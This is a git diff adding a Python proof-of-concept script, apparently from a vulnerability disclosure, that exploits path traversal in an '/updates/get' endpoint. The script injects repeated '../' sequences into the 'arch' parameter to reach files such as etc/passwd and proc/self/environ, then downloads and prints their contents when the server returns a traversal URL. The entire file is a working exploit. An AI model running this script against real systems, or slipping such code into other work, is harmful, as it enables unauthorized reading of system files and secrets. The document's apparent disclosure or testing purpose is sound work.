diff --git a/rosetta-sdu-2026-0000/poc2.py b/rosetta-sdu-2026-0000/poc2.py
new file mode 100644
index 0000000..cf5511c
--- /dev/null
+++ b/rosetta-sdu-2026-0000/poc2.py
@@ -0,0 +1,39 @@
+import sys
+import json
+from urllib.request import urlopen
+from urllib.parse import urlencode
+from urllib.error import URLError
+
+u = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8080"
+u = u.rstrip("/")
+t = ["etc/hostname", "etc/passwd", "proc/1/cmdline", "proc/self/environ", "proc/cpuinfo"]
+
+for d in range(1, 11):
+    up = "/".join([".."] * d)
+    for f in t:
+        a = f"{up}/{f}"
+        params = urlencode({
+            "platform": "android",
+            "arch": a,
+            "app": "1.0.0",
+            "kernel": "0.0.0"
+        })
+        try:
+            r = urlopen(f"{u}/updates/get?{params}", timeout=5)
+            data = json.loads(r.read())
+        except (URLError, ValueError):
+            continue
+
+        k = data.get("kernelUpdateRequired") or data.get("kernel_update_required")
+        kurl = data.get("kernelUrl") or data.get("kernel_url")
+        if k and kurl and ".." in kurl:
+            print(f"Found: {kurl}")
+            try:
+                c = urlopen(u + kurl, timeout=5).read().decode("utf-8", errors="replace")
+                print(c[:1000])
+            except URLError:
+                print("Download failed")
+            sys.exit(0)
+
+print("Not vulnerable")
+sys.exit(1)